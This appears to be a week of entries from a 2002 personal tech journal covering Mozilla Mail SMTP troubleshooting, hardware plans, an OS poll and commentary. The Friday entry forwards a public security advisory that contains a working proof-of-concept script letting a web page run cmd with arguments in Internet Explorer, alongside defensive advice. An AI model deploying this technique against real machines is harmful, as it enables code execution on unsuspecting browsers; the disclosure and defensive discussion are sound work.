| 3Home » Daynotes Home » Week of 11 November 2002 |
 |
Daynotes
Journal
Week of 11 November 2002 Latest Update : Sunday, 17 November 2002 09:38 -0500 |
 |
| Click Here to Subscribe | Buy PC Hardware in a Nutshell, 2nd Edition: | [Amazon] [Barnes & Noble] [Bookpool] | Visit Barbara's Journal Page |
Monday, 11 November 2002
[Last Week] [
Monday ] [Tuesday] [Wednesday
] [Thursday] [Friday] [Saturday]
[Sunday] [Next Week]
[Daynotes Journal Messageboard]
[HardwareGuys.com
Messageboard] [TechnoMayhem.com
Messageboard]
9:13 - Things are a bit different around here this morning. Barbara has taken a part-time job with a local law firm. She works from 8:00 a.m. until noon five days a week. She didn't get very good weather for her first day of work. Kerry woke us up about 6:00 a.m. thrashing around, apparently because he saw a bright lightning flash that frightened him. We turned on the Weather Channel and found that we're under a tornado watch until 11:00 a.m. Just as Barbara was about to leave for work, another alert came on to warn us that an extremely heavy thunderstorm was about 10 miles west of us and moving toward us at 50 MPH. A couple of minutes after Barbara left, it hit, with downpours and frequent heavy lightning.
Duh. You know those jokes about techno-peasants whose VCRs blink 12:00 continuously? I did something nearly as bad. We were cleaning up the downstairs and rearranging things. We decided that because we almost never watch television in the bedroom, it'd make sense to move the TV and VCR from our bedroom to the downstairs area. We didn't have any problems moving them, other than the fact that I'm getting too old to lug 25" televisions down narrow flights of stairs.
But there was one problem, which we didn't notice until yesterday morning while working downstairs. The VCR was recording. Hmmm. I had been taping Forsyte Saga on PBS. For multi-part stuff like that, we ordinarily tape everything and then watch it all at once or over the course of just a few days. We recorded the first two or three episodes while the TV and VCR were in our bedroom. When I moved them, I had to reprogram everything, of course. At first, I thought I'd set the VCR to record from 9:00 a.m. until 10:00 a.m. on Sundays, rather than 9:00 p.m. until 10:00 p.m. That turned out not to be the case. Instead, I'd set the VCR clock off by 12 hours. Oh, well. The reviews I've read of the program haven't been great, so we may not have missed much.
If you use Mozilla Mail with multiple accounts, be very careful about changing the SMTP server configuration. Pournelle was having some problems with his mail over the weekend. Every time he tried to POP, Outlook and/or Norton would choke on one message and refuse to retrieve his mail. I telnet'd in and didn't see any problem, but the problems persisted on his end. So I decided to POP his mail to my machine, delete all the messages on his server manually, and then forward him any messages that mattered.
As we were messing with mail, the subject of using alternative SMTP servers came up. Jerry tried to configure his mail client to use the mail server on rocket, which hosts his web site and POP server. Using that server for SMTP requires authentication, but in Mozilla Mail there's nowhere to enter the password. You can check a box to tell Mozilla Mail that the SMTP server requires authentication, and there's a place to enter your username. But there's nowhere to enter your password. Supposedly, the first time you send mail, Mozilla will pop up a dialog and ask for your password. The trouble is, it doesn't.
Jerry tried configuring Mozilla Mail to use rocket as his SMTP server. He marked the "requires authentication" checkbox and entered his username. When he tried to send mail, Mozilla popped up a dialog to tell him that login had failed. No request for his password, just a notification that Mozilla couldn't log on to the server. That seemed odd, so I decided to try setting up authenticated SMTP on rocket for myself. I encountered exactly what Jerry did. A "sending" progress bar immediately interrupted by a notice that Mozilla couldn't log on to the SMTP server. Never a request for password.
Okay, I could live with that for now, since my local SMTP server is working just fine. The trouble was, Mozilla now had rocket configured as the default SMTP server, which meant I couldn't send any mail at all. So I went to Edit -> Mail & Newsgroups Account Settings -> Outgoing Server (SMTP) -> Advanced, intending to delete the entry for rocket. The dialog that appeared started with a warning:
Although you can specify more than one outgoing server (SMTP),
this is recommended only for advanced users. Setting up multiple
SMTP servers can cause errors when sending messages.
which seemed to be good advice. The trouble was, I had a bunch of SMTP servers configured. The top one was the new server I'd configured for rocket, so I deleted that one. Below it, the whole window was full of SMTP servers with identical names, 192.168.111.204, which is the private IP address of my local SMTP server. I knew that I hadn't set those up, but I figured I'd leave well enough alone, so I exited the dialog and again tried to send mail. Mozilla Mail again popped up a message about being unable to send mail and suggesting that I check my SMTP server configuration.
So I went back to the SMTP server dialog in Mozilla and looked more closely. There were half a dozen or so instances of SMTP servers, all named 192.168.111.204. But that wasn't all. When I'd scrolled down to the bottom of the list, the scroll bar made clear that there were more, even though it looked like I had the last one highlighted. So I clicked in the empty space below the last listed SMTP server. That area turned reverse-video blue, and I noticed that the Edit button was still live. I clicked that, and Mozilla brought up a configuration screen for that invisible SMTP server. It was just like all the others, set to 192.168.111.204, except that it had the "Use name and password" checkbox marked (with an empty username box) and it had the "Use secure connection (SSL)" radio button set to "When available".
Aha. I figured these "invisible" SMTP servers were causing the problem, so I deleted all of them. There were eight or so, and after I deleted the first couple I found that there were more regular "visible" SMTP servers in the list below them. Those hadn't been showing in the list because the dialog box shows only six at a time. With all of the "invisible" SMTP servers deleted, I saved the changes, or attempted to do so. Clicking OK on the configuration dialog returned me to the main Mail & Newsgroups Account Settings dialog, but clicking OK there did nothing at all. After waiting a minute or two on the assumption that Mozilla was busy saving changes, I finally just clicked the X up in the corner to clear the dialog. I immediately re-entered it, and found that my changes had in fact been saved. So I tried once again to send mail, and once again I got the message about not being able to log on to the server. Arrrghhh.
So I decided to go back in with fire and sword and kill all of the "extra" SMTP servers. I did that, finally getting down to just the "192.168.111.204 (default)" one. I wanted to kill that one, too, and start from scratch, but Mozilla wouldn't let me delete the default SMTP server. So I saved my changes, again finding that the OK button at the main dialog did nothing, again waiting a minute or two, and again clicking the X to exit. I then restarted Mozilla Mail and again tried to send. The same error message popped up. Double Arrrghhh.
I went off to the Mozilla directory in search of configuration files that might be pointing to the wrong place. In prefs.js, I found a bunch of references to multiple SMTP servers in the form "smtp8" and so on. I figured that the problem now was that Mozilla was pointing to non-existent SMTP servers, so I search out each instance of SMTP2, SMTP3, and so on, and changed all of those to SMTP1. After re-starting Mozilla, I again tried sending mail, only to get the same error message.
Then the little light-bulb came on over my head. When Mozilla says it recommends using only one SMTP server, it means one per account. I have four or five accounts in Mozilla, and I happened to be attempting to send from other than the default account, which presumably uses SMTP server #1. I checked the prefs.js file and again found references to SMTP servers numbered as high as SMPT8. So I went back to the SMTP -> Advanced dialog, and created a bunch of new SMTP servers. All were identical. Just to be safe, I created about 10 of them. When I exited the dialog, once again the OK button in the main dialog did nothing. I clicked the X to close it, shut down and restarted Mozilla Mail on general principles, and again tried to send. This time, the mail went out normally.
All of this cost me a couple of hours, but I learned a lesson. Mozilla Mail lies. It doesn't want just one SMTP server. It wants one per account. If you use multiple accounts and have need of messing with your Mozilla Mail SMTP configuration, remembering that may save you a lot of time.
[Top]
Tuesday, 12 November 2002
[Last Week]
[ Monday ] [Tuesday] [Wednesday
] [Thursday] [Friday] [Saturday]
[Sunday] [Next Week]
[Daynotes Journal Messageboard]
[HardwareGuys.com
Messageboard] [TechnoMayhem.com
Messageboard]
8:55 - Barbara uses a Microsoft Internet Keyboard Pro on her system. One of its features is a "Sleep" button. She accidentally pressed it yesterday, and I could find nothing that would wake the system up again other than a power reset. Sleep, indeed. That button should be labeled "Irreversible Coma".
Actually, it's about time to replace Barbara's system anyway. It's an Intel D815 motherboard with a Pentium III/1.0G processor, 256 MB of PC133 SDRAM, a SCSI Seagate Barracuda hard drive, a SCSI Plextor UltraPlex CD-ROM drive, a SCSI Plextor CD writer, and an ATAPI DVD-ROM drive. It was the fastest and most up-to-date machine in the house when we built it, but it's beginning to show its age. One irony of people like Pournelle and me is that we both tend to have all the latest stuff lying around on workbenches and hanging out of test-bed systems, but when it comes to our main machines we're seriously out of date. That gets fixed periodically, of course, but when we build ourselves new main machines, we tend to use the new main machine for another couple years, by which time it's again seriously out of date.
Actually, I'm not in horrible shape in that respect at the moment. I'm not up-to-date, but I'm not seriously behind, either. The main Windows 2000 system in my office is an Intel 845WNL motherboard with a Pentium 4/1.7G processor and 512 MB of PC133 SDRAM. My main Linux box is, as I recall, an Intel D845BG with a Pentium 4/2.0G Northwood processor and 512 MB of PC1600 or PC2100 DDR-SDRAM. My den system does lag a bit. As I recall, it's an Intel D815 motherboard with a Pentium III/750 processor.
And I find myself about to do something I thought I'd never do. I'm going to build a new system to run, get this, Windows XP Home. Not even XP Pro, but XP Home. I need it to do some screenshots, which means I want it to be reasonably up-to-date hardware-wise (for those times when I'm shooting a screenshot that shows the connected hardware). But I sure won't use it for anything serious. I may even activate it this time. For the XP screenshots in the current edition of PC Hardware in a Nutshell, I never did activate XP. I installed it, did a bunch of screenshots, and then let it sit. When the 60-day grace period was nearly up, I just let it expire naturally. At some point later I went back to do some more screenshots, so I just wiped the drive and re-installed, again without activating it. This time I think I'll activate it just for the eXPerience.
Which reminds me that I probably need to do something about updating my screen capture software. I'm still using the original copy of Collage that Que Corporation sent me back in about 1995 when I started writing for them. This is an antique 16-bit program, but it still works. Every time I start doing screenshots I think about updating it, but I've just never gotten around to it. Actually, I should probably just use IrfanView to capture screens. I've used it once or twice and it seems to work fine. It's just not what I'm used to. Perhaps I'll just get used to it. I do use it for most of my graphics viewing, so I'm comfortable with the program itself.
I somehow ended up in Google's newsgroup search yesterday. I forget what I was looking for originally, but at some point I decided to look for my oldest posts to USENET. I'd done that before, but this time I decided to be more systematic about it. Bottom line, there are a lot of early posts missing from the Google archives. A lot of them. As simple evidence of that, I did a search for articles that contained "forsyth!thompson", which was my UUCP address from early 1988 through late 1991. I found a grand total of two articles listed, despite the fact that I posted hundreds, perhaps thousands, of articles during that three to four year period.
The very first article I posted was sometime in the early 1980's, when I had "unofficial" access. I won't mention how, not that the guy who gave me "midnight permission" would be likely to get in any trouble at this late date, but better safe than sorry. So the upshot is that I've now been "on the 'Net" for about twenty years, but all record of the first half of that period is apparently gone. Oh, well. Perhaps it's better that way.
[Top]
Wednesday, 13 November 2002
[Last Week]
[ Monday ] [Tuesday] [Wednesday
] [Thursday] [Friday] [Saturday]
[Sunday] [Next Week]
[Daynotes Journal Messageboard]
[HardwareGuys.com
Messageboard] [TechnoMayhem.com
Messageboard]
8:26 - Still heads-down writing, so nothing much to say this morning. I do have some current-generation stuff on the way in from Intel, Plextor, and Seagate, so I'll have some interesting stuff to play with soon.
[Top]
Thursday,
14 November 2002
[Last Week] [
Monday ] [Tuesday] [Wednesday
] [Thursday] [Friday] [Saturday]
[Sunday] [Next Week]
[Daynotes Journal Messageboard]
[HardwareGuys.com
Messageboard] [TechnoMayhem.com
Messageboard]
8:21 - Still writing, so there's nothing much to say. I've started doing the morning Mom visit, which means I can then work straight-through until dinnertime.
Don't forget that the Leonids meteor storm happens next week. More information here and here (scroll down). I'm not sure what Barbara and I will do now that she's due at work at 8:00 a.m. We may go to bed early and head up to the site around 0300 the 19th to catch just the second peak, or we may head up early in the evening of the 18th, nap until the first peak, and then nap again between the first and second peaks.
There's also a lunar eclispe the following evening, but it's a penumbral eclipse. That means the moon dims but isn't blacked out at all. A lot of people won't even notice that there's an eclipse taking place.
[Top]
Friday, 15
November 2002
[Last Week] [
Monday ] [Tuesday] [Wednesday
] [Thursday] [Friday] [Saturday]
[Sunday] [Next Week]
[Daynotes Journal Messageboard]
[HardwareGuys.com
Messageboard] [TechnoMayhem.com
Messageboard]
8:55 - I sent the following message to subscribers this morning. If you're running Internet Explorer, it's worth your time to read. It's more than a week old, but I hadn't heard about it.
Thanks to Greg Lincoln for forwarding the following message.
I haven't looked at the exploit in detail yet, but it appears to be potentially a bad one. The key issue is the ability to use parameters with scripts, which opens a whole new can of worms.
I've never considered simply disabling scripting in IE to be an adequate defense. I also delete the wscript.exe and cscript.exe executables, and suggest that you do the same.
Note that in Windows 2000 and later, simply deleting the executables doesn't suffice, because Windows helpfully replaces them. You must first delete those executables first from the DLLcache directory and then from the main system32 directory. When you delete the latter, Windows pops up an error message warning about system instability, etc. You can safely dismiss that message.
In addition, I recommend running a product like Norton Internet Security or WebWasher, which can remove scripts on-the-fly before your browser sees them.
Bob
--
Robert Bruce Thompson
thompson@ttgnet.com
http://www.ttgnet.com/thisweek.html
http://forums.ttgnet.com/ikonboard.cgi
-------- Original Message --------
Subject: Have you seen this IE/windows vuln?
Date: Fri, 15 Nov 2002 07:26:37 -0500
From: Greg Lincoln
To: Robert Bruce Thompson (E-mail) <thompson@ttgnet.com>
Bob,
Have you seen this yet? This could be used to format local drive just by
viewing the malicious page! I tried it on my fully patched win2k box and
was able to format a disk in drive A:. Scary stuff.
Greg
-------- Original Message --------
Subject: How to execute programs with parameters in IE - Sandblad
advisory #10
Date: Wed, 6 Nov 2002 20:48:03 +0100 (CET)
From: Andreas Sandblad <sandblad@acc.umu.se>
To: bugtraq@securityfocus.com
- Sandblad advisory #10 -
----------------------------------------------------------------
Title: "How to execute programs with parameters in IE"
Date: [2002-11-06]
Software: Internet Explorer (webbrowser control)
Vendor: http://www.microsoft.com/
Impact: Javascript in "Internet zone" may
execute programs with parameters _ _
o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
TABLE OF CONTENTS:
==================
Introduction ................................................. 1
Vendor status ................................................ 2
Details ...................................................... 3
Exploit ...................................................... 4
Disclaimer ................................................... 5
Feedback ..................................................... 6
(1) INTRODUCTION:
=================
By default all internet contents such as homepages are placed in the
"Internet zone". Local content viewed in IE runs in the "Local computer
zone" with less restrictions.
In the past we have seen many vulnerabilities where script in the
"Internet zone" could access the "Local computer zone". The script could
do actions like:
- Read local files if the exact path is known and file can be opened by
IE.
- Execute local programs (exact path required) WITHOUT parameters using
the codebase attack.
It will be shown in this document how script in the "Local computer zone"
can actually be designed to run arbitrary programs WITH parameters (exact
path not needed). The technique used may open up far more dangerous
attacks than seen before.
(2) VENDOR STATUS:
==================
Microsoft was initially contacted 2002-10-04. After several mail
exchanges, their final response were that the technique used to run
programs with parameters from the "Local computer zone" was no security
vulnerability. A fix should instead be applied for all possibilities for
content in the "Internet zone" to access the "Local computer zone".
(3) DETAILS:
============
Javascript can use the showHelp command to do one of the following two
operations:
1. Open a local compiled help file (.chm) in a separate winhelp window.
2. Open an url (must begin with http://) in a separate winhelp window.
Script in window opened as (1) may use the shortcut command (activeX
control) to run programs with parameters, but (2) may not. Nothing
strange, normal security restrictions.
After some investigations I found a way to make (2) use the shortcut
command. The following must be done:
3. Script in (2) gets access to the "Local computer zone".
4. Script in (2) changes url to "mk:@MSITStore:C:" or similiar.
5. A local compiled help file must have been opened since IE was first
started. Any help file will do. For example showHelp("iexplore.chm").
In order to achieve (3) there are several nonpatched "cross site/zone
scripting" vulnerabilites to use. To achieve (4) a new window must be
created from (2). By using the "opener" object it is possible to keep
control of the winhelp window (2) even after the url is changed. (5) is
trivial to achieve and will not affect the winhelp window for (2), since
it is opened in a different window by default.
Before MS02-055 was released by Microsoft the above were a lot more easier
to perform. (3) and (4) could then be skipped.
(4) EXPLOIT:
============
The exploit uses a nonpatched "cross site/zone scripting" vulnerability
published by Liu Die Yu 2002-10-01 to Bugtraq:
http://online.securityfocus.com/archive/1/293692
It could also be possible to use one of the many "cross site/zone
scripting" vulnerabilities Greymagic found:
http://sec.greymagic.com/adv/gm012-ie/
Recently I reported a new "cross site/zone scripting" vulnerability to
Microsoft that could also be used. But since no patch is yet produced,
information about it will not be published.
In order for not having to put script in 3 separate files I have combined
them into one single file. The script will check for text after the # sign
in the url to determine what to perform (url's hash). If your computer is
heavily loaded, then the value of the setTimeout timer has to be
increased. The timer is needed because the "mk:@MSITStore:C:" url is not
set directly by IE.
INSTRUCTIONS:
1. Copy the content below and place it in a html file.
2. REMOVE THE * FROM THE SCRIPT TAG.
3. Place the file on a remote webserver and load it in IE (URL MUST START
WITH HTTP://).
4. The script will open up a dos window and display a line of text, create
the file c:/vulnerable.txt (write permission required) and start winmine
(this excellent game must exist). The help window for IE will not be
closed.
TESTED:
Win2000 pro, XP, IE 6 (latest patches).
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
--------------------------- CUT HERE ---------------------------
(5) Disclaimer:
===============
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.
(6) Feedback:
=============
Please send suggestions and comments to: _ _
sandblad@acc.umu.se o' \,=./ `o
(o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad, student in Engineering Physics and
Computing Science at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
--
Greg Lincoln
Muse Root
http://www.linuxmuse.com
12:59 - Someone asked me in passing whether I thought my readers were more likely than average to run Linux, Windows 2000, and other "advanced" operating systems rather than Windows 9X. I said I thought that was probably true, but there was one way to find out. So I set up a poll over on the messageboard that lists ten choices of operating system (I was limited to ten, so I couldn't list all the ones I'd have liked to list).
If you'd like to see what my readers are using, click here to view the poll. Please add your vote to the poll. Doing that requires you register on the messageboard, but that takes only a minute, doesn't hurt much, and doesn't expose you to more spam or other privacy violations.
I'll leave the poll open for a week or two to see how many responses we can gather.
[Top]
Saturday,
16 November 2002
[Last Week] [
Monday ] [Tuesday] [Wednesday
] [Thursday] [Friday] [Saturday]
[Sunday] [Next Week]
[Daynotes Journal Messageboard]
[HardwareGuys.com
Messageboard] [TechnoMayhem.com
Messageboard]
10:50 - In case you missed my second post yesterday, I'm running a "which OS do you use" poll over on the messageboard. There are only 51 votes so far, but the results are pretty much as expected. Windows 2000 Pro is in first place, Windows XP Pro is in a distant second place, and Linux is not far behind in third place.
It'll be interesting to compare the results of this poll against my web access logs. Those don't lie, but they don't tell the complete truth, either. They record the OS actually used for each visit to my sites, but what they don't tell me is which OS is the primary OS used by the visitor. For example, I hit my own sites with various systems, which run Windows 2000 Professional, Red Hat Linux 8.0, Windows XP Pro, Windows 98SE, and even Windows NT 4 Workstation. All of those visits show up in the logs, but they don't show that my primary OS is Windows 2000.
If you haven't voted yet, please do so. Voting requires that you be registered on the messageboard, but that takes only a minute to do if you haven't done it already. I'll leave the poll open for a week or two to see how many responses we can gather.
Speaking of the messageboard, Greg Lincoln upgraded it last night to the latest stable version of Ikonboard. We were a couple versions behind, and were debating whether to upgrade to a newer version of Ikonboard or to convert to phpBB. I like both, so I told Greg whatever he decided was fine with me. As it turned out, we'd have been able to import the users and messages into phpBB, but there would have been some difficulties in importing groups and permissions. So Greg decided to upgrade to a later version of Ikonboard, which is fine with me.
I don't know what, if any, new capabilities the upgraded version has, but it appears to work fine. I'm not sure I like the new color scheme, but it may grow on me.
Roland Dobbins wrote:
Homeland 'Security'.
http://www.theinquirer.net/?article=6250
That is truly terrifying.
How long can it be before the HSHA folks come up with a nice new uniform, say
black with silver piping? I also wonder what kind of ID they'll use. Those
laminated plastic cards are passé. They should consider stamped metal oval
discs instead. I think I even have a sample around somewhere if they need one.
I also wonder if the guy they just hired will have the rank of admiral, or if
they'll promote him to Oberstgruppenführer. That'd be appropriate for the head
of the Heimatsicherheitshauptamt.
Here's an interesting article about the intelligence failures leading up to 9/11. Mr. Meyer makes a very good point. It's become Politically Incorrect to recognize that some people are smarter than others, but the fact remains that any reasonable person recognizes that there are tasks for which only truly bright people are suited. For example, we don't want well-meaning but dull engineers designing bridges, and like most people I'd be worried if I learned that a surgeon who was to operate on me or a family member had graduated last in his class from a medical school that admitted him on quota.
Mr. Meyer makes the same point about scientific research and extends that to intelligence operations. According to him, the problems that allowed 9/11 to occur without forewarning occurred because our intelligence analysts simply aren't smart enough. He has a good point, too. I remember reading back in the late '60's and early '70's a series of books on code-breaking such as Winterbotham's The Ultra Secret.
Apparently, we had the beginnings of Politcal Correctness even then, because although all of the books made a point of talking about the characteristics of the people who actually broke the codes, none of them mentioned the real characteristic all of those code-breakers shared. The books talked about the code-breakers being university professors, crossword puzzle mavens, and so on, but they ignored the key factor. All of the people who broke those codes were brilliant.
Intelligence differs between people, and there are some tasks that simply require very high intelligence. If the goal is to solve a difficult problem, a room full (or a country full) of IQ 100 people cannot achieve what one person of IQ 150 can achieve. If the problem is extraordinarily difficult, a room full of IQ 150 people cannot achieve what one IQ 200 person can achieve. That's the reality, although the Politically Correct crowd desperately wants to deny it.
Mr. Meyer points out that when there are very difficult problems to solve, the way to do it is to put a bunch of brilliant people to work on the task, and to have them supervised by someone who is even more brilliant. He's exactly right, and that's exactly what didn't happen with the US intelligence operations. I have apologized for those intelligence failures in the past, but only in the sense of saying that it was ridiculous to attribute those failures to evil motives or a conspiracy. What we had was a large group of IQ 120 people doing the best job they could. What we needed was a small group of IQ 150 people, led by an IQ 200 administrator, doing the best job they could, and directing the efforts of the others.
The trouble is that geniuses do not suffer fools gladly. Why would they? But that means that geniuses are very difficult to manage. They respect the opinions only of people who are as smart (or smarter) than they are. They're often very strange people with few social skills, nor any desire to learn them. In short, they don't play nice with others.
I am reminded of the movie Midway, in which Hal Holbrook played Commander Joseph Rochefort, who led the team that broke the Japanese naval codes, and was therefore almost single-handedly responsible for the US naval victory at Midway. That's not to minimize the contributions of the thousands of officers and men who actually fought the battle, but the simple fact is that with Rochefort the US won (albeit with a couple of extraordinarily lucky breaks) whereas without Rochefort the US would certainly have lost. Although the movie gave a taste of the weirdness of the code-breakers--wearing slippers and robes and forgetting to take a shower for days on end--it really didn't make a point of it.
In fact, one of Rochefort's main problems was keeping his brilliant staff out of the brig, because their respect for military rank and discipline was, to put it mildly, lacking. Anyone who attempts to overhaul our intelligence operations on similar lines will encounter similar problems. Brilliant people are needed to do the analyses, and yet brilliant people are unlikely to be willing to work in the typical regimented government environment. Even if you succeed in hiring them, holding on to them will be a problem. And even if you somehow hold on to them, keeping them isolated from pointy-haired bosses may be the biggest problem of all.
[Top]
Sunday, 17 November
2002
[Last Week] [
Monday ] [Tuesday] [Wednesday
] [Thursday] [Friday] [Saturday]
[Sunday] [Next Week]
[Daynotes Journal Messageboard]
[HardwareGuys.com
Messageboard] [TechnoMayhem.com
Messageboard]
9:38 - The usual Sunday morning tasks. Barbara is cleaning house like the old White Tornado.
I had to move my to-be-read pile. I usually keep my TBR L2 cache on the loveseat in the den, with the the TBR L1 cache on top of my monitor. As any reader knows, the worst thing is running out of new things to read. The next worst thing is not having a choice about what to read. What if the only thing I have left to read turns out to be bad, or if it's just not what I feel like reading? As Barbara can tell you, there are times when I wander around the house looking at the various bookshelves for something that, if not exactly new to me, is at least something I feel like reading and haven't read for a while. I like to keep at least 20 books queued up in my TBR pile, and 50 is better. When it gets down below five, I get nervous, and if there are only a couple books in it I figure it's time for an emergency library run.
I do have a cunning plan, though. An L3 TBR cache. Barbara volunteers at the Reynolda Manor branch library, and one of the things she does is sort through donated books. They get piles and piles of them. If Barbara lets it go for a month, the room in which they store the donated books ends up literally overflowing, with boxes and piles of books out in the hall.
Barbara sorts through the books and categorizes them. Some, like Readers' Digest Condensed Books and antique computer books, get pitched in the giant garbage can in the corner. Others, like recent hardback popular fiction, go into the RM collection or, if RM already has sufficient copies, are sent to other branch libraries.
Sometimes, as when a book club edition of a bestseller is released, Barbara ends up with way too many copies of a particular title. She also ends up with a large surplus of paperbacks, mostly popular fiction, mysteries, and romances.I suggested a month or so ago that rather than discard these, we box them up and carry them over to the nursing home where my mother lives. (We'll talk to them about it first, of course). The nursing home doesn't have a library, but there are a lot of people there who would probably like to have a supply of books handy. All it would take would be some bookshelves. There wouldn't have to be any kind of circulation control, because these are books that would have been discarded anyway so it doesn't matter if they aren't returned. Any that walk away would be easy enough to replace with new ones. We'd need to weed and replace the books anyway, so people who carried away a book and didn't return it would actually be making things easier.
Well, I'd better get to the laundry, get my weekly full tape backup started, and get over to visit mom.
[Top]